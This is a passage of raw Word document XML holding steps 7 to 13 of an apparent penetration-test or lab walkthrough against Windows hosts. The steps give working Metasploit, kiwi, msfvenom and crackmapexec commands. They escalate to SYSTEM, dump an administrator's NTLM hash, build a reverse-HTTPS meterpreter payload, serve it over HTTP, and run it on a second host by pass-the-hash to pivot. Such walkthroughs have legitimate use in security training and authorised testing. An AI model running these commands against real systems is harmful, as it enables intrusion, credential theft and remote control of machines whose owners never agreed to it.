          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Interact with the session using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i 1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Highlighted below is the user </w:t>
      </w:r>
      <w:r w:rsidRPr="005520A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>itwk03\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005520A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3125A251" w14:textId="77777777" w:rsidR="00741ED4" w:rsidRDefault="00741ED4" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74549A6A" w14:textId="1621EE44" w:rsidR="00741ED4" w:rsidRDefault="00827E1E" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EBE73A8" wp14:editId="78A8CB03">
            <wp:extent cx="8229600" cy="3851275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20797775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77534"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3851275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26328EB7" w14:textId="77777777" w:rsidR="002526E8" w:rsidRDefault="002526E8" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C068D4" w14:textId="77777777" w:rsidR="002526E8" w:rsidRDefault="002526E8" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15FBC4E4" w14:textId="77777777" w:rsidR="002526E8" w:rsidRDefault="002526E8" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5045B70E" w14:textId="77777777" w:rsidR="002526E8" w:rsidRDefault="002526E8" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C047F9" w14:textId="77777777" w:rsidR="002526E8" w:rsidRDefault="002526E8" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3391860F" w14:textId="18700377" w:rsidR="002526E8" w:rsidRPr="00264322" w:rsidRDefault="002526E8" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 8</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D513C1">
        <w:tab/>
        <w:t>Upgrade the shell with ‘</w:t>
      </w:r>
      <w:r w:rsidR="00D513C1" w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multi/manage/shell_to_meterprete</w:t>
      </w:r>
      <w:r w:rsidR="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00264322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00264322">
        <w:t xml:space="preserve">Highlighted below, after running </w:t>
      </w:r>
      <w:r w:rsidR="00264322" w:rsidRPr="00264322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:r w:rsidR="00264322">
        <w:t xml:space="preserve"> on upgraded meterpreter shell, we get </w:t>
      </w:r>
      <w:r w:rsidR="00264322" w:rsidRPr="00264322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidR="00264322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15042D5A" w14:textId="39E4B228" w:rsidR="002526E8" w:rsidRPr="00D513C1" w:rsidRDefault="00D513C1" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">use post/multi/manage/shell_to_meterpreter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58283ABC" w14:textId="575E04E4" w:rsidR="00D513C1" w:rsidRPr="00D513C1" w:rsidRDefault="00D513C1" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">set session </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73530CE5" w14:textId="285B3B3D" w:rsidR="00D513C1" w:rsidRPr="00D513C1" w:rsidRDefault="00D513C1" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sessions -i 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449DEE4B" w14:textId="28BED13E" w:rsidR="00D513C1" w:rsidRDefault="00D513C1" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E45B984" w14:textId="790FF880" w:rsidR="002526E8" w:rsidRDefault="002526E8" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BD347E" wp14:editId="5A3D31B5">
            <wp:extent cx="8229600" cy="3879850"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="15626043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4308"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3879850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD23E1" w14:textId="77777777" w:rsidR="00F36567" w:rsidRDefault="00F36567" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670E647A" w14:textId="77777777" w:rsidR="00F36567" w:rsidRDefault="00F36567" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8866C9" w14:textId="631AFB31" w:rsidR="00F36567" w:rsidRPr="00412D84" w:rsidRDefault="00F36567" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Dump the NTLM hash for </w:t>
      </w:r>
      <w:r w:rsidRPr="00F36567">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>itwk04admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F36567">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>creds_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00335060">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00335060">
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:r w:rsidR="00335060" w:rsidRPr="00264322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidR="00335060">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00335060">
        <w:t>meterpreter session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00412D84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00335060">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00412D84">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>The NTLM hash is highlighted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C67A2E" w14:textId="0030F755" w:rsidR="00F36567" w:rsidRPr="00F36567" w:rsidRDefault="00F36567" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>load_kiwi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="256D5241" w14:textId="7ADDEFDA" w:rsidR="00F36567" w:rsidRPr="00F36567" w:rsidRDefault="00F36567" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>creds_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62398CAC" w14:textId="77777777" w:rsidR="00F36567" w:rsidRDefault="00F36567" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A32F9D7" w14:textId="58A2A48C" w:rsidR="00F36567" w:rsidRDefault="00F36567" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="728F70A3" wp14:editId="5176EBB4">
            <wp:extent cx="8229600" cy="3678555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="214425135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51352"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9600" cy="3678555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46295CF2" w14:textId="77777777" w:rsidR="005520A6" w:rsidRDefault="005520A6" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DA3821" w14:textId="77777777" w:rsidR="005520A6" w:rsidRDefault="005520A6" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F355CD5" w14:textId="77777777" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20666E40" w14:textId="77777777" w:rsidR="005C0CB1" w:rsidRDefault="005C0CB1" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583D1077" w14:textId="2C207C5B" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step10</w:t>
      </w:r>
      <w:r>
        <w:t>: Target IP (</w:t>
      </w:r>
      <w:r w:rsidRPr="00335060">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.233.206</w:t>
      </w:r>
      <w:r>
        <w:t>) to pivot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DC5C9B" w14:textId="77777777" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241E7795" w14:textId="4D493EFF" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E029DAC" wp14:editId="01E1E0BA">
            <wp:extent cx="8229600" cy="3851275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7517684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68450"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3851275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0352BEA0" w14:textId="77777777" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA180CB" w14:textId="77777777" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1563A647" w14:textId="77777777" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2021BB6C" w14:textId="77777777" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F34B4F" w14:textId="77777777" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5E3C1A" w14:textId="21ACE3FB" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 11</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00BA0FF3">
        <w:t xml:space="preserve"> Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA0FF3" w:rsidRPr="00BA0FF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA0FF3">
        <w:t xml:space="preserve"> to create a payload and host it on a </w:t>
      </w:r>
      <w:r w:rsidR="00BA0FF3" w:rsidRPr="00BA0FF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python server</w:t>
      </w:r>
      <w:r w:rsidR="00BA0FF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B247B" w14:textId="5A57BC0A" w:rsidR="00BA0FF3" w:rsidRDefault="00BA0FF3" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter_reverse_https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=&lt;LOCAL IP&gt; LPORT=443 -f exe -o pivot.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120597B6" w14:textId="451D77BD" w:rsidR="00BA0FF3" w:rsidRPr="00BA0FF3" w:rsidRDefault="00BA0FF3" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64383F10" w14:textId="77777777" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F539D2F" w14:textId="30A22433" w:rsidR="00335060" w:rsidRDefault="00335060" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57538EC5" wp14:editId="26400A8F">
            <wp:extent cx="8229600" cy="1855470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197248092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0922"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1855470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="009303CD" w14:textId="77777777" w:rsidR="00210B19" w:rsidRDefault="00210B19" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E965FA" w14:textId="75991725" w:rsidR="00210B19" w:rsidRPr="00210B19" w:rsidRDefault="00210B19" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to upload the malicious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">pivot.exe. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73960C68" w14:textId="2C71A589" w:rsidR="00210B19" w:rsidRPr="00A95C5E" w:rsidRDefault="00210B19" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –local-auth -u itwk04admin </w:t>
      </w:r>
      <w:r w:rsidR="00A95C5E" w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-H “&lt;NTLM hash&gt;” -X “&lt;LOCAL WEB_SERVER IP/pivot.exe</w:t>
      </w:r>
      <w:r w:rsidR="005D0252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00A95C5E" w:rsidRPr="00A95C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>” &lt;TARGET IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237DCCF9" w14:textId="5C891A67" w:rsidR="00210B19" w:rsidRDefault="00210B19" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C6BAA0" wp14:editId="3CCD2CE4">
            <wp:extent cx="8229600" cy="1223010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="173055293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2932" name="Picture 13"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1223010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F6579" w14:textId="77777777" w:rsidR="005520A6" w:rsidRDefault="005520A6" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403E68E9" w14:textId="77777777" w:rsidR="005520A6" w:rsidRDefault="005520A6" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5D4B58" w14:textId="4595539F" w:rsidR="00CA70E3" w:rsidRDefault="00CA70E3" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Start a listener using </w:t>
      </w:r>
      <w:r w:rsidR="005D0252">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="005D0252" w:rsidRPr="005D0252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit/multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="005D0252">
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A0F2FC" w14:textId="73494066" w:rsidR="005D0252" w:rsidRPr="005D0252" w:rsidRDefault="005D0252" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006C555A" w14:textId="1D00542A" w:rsidR="005D0252" w:rsidRPr="005D0252" w:rsidRDefault="005D0252" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set PAYLOAD windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter_reverse_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E534F9B" w14:textId="3C57C7EA" w:rsidR="00CA70E3" w:rsidRDefault="005D0252" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB5011D" w14:textId="672F1F25" w:rsidR="00CA70E3" w:rsidRDefault="00CA70E3" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15CAB7DE" wp14:editId="24AA856B">
            <wp:extent cx="8229600" cy="2346325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2333558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5894"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0" cy="2346325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
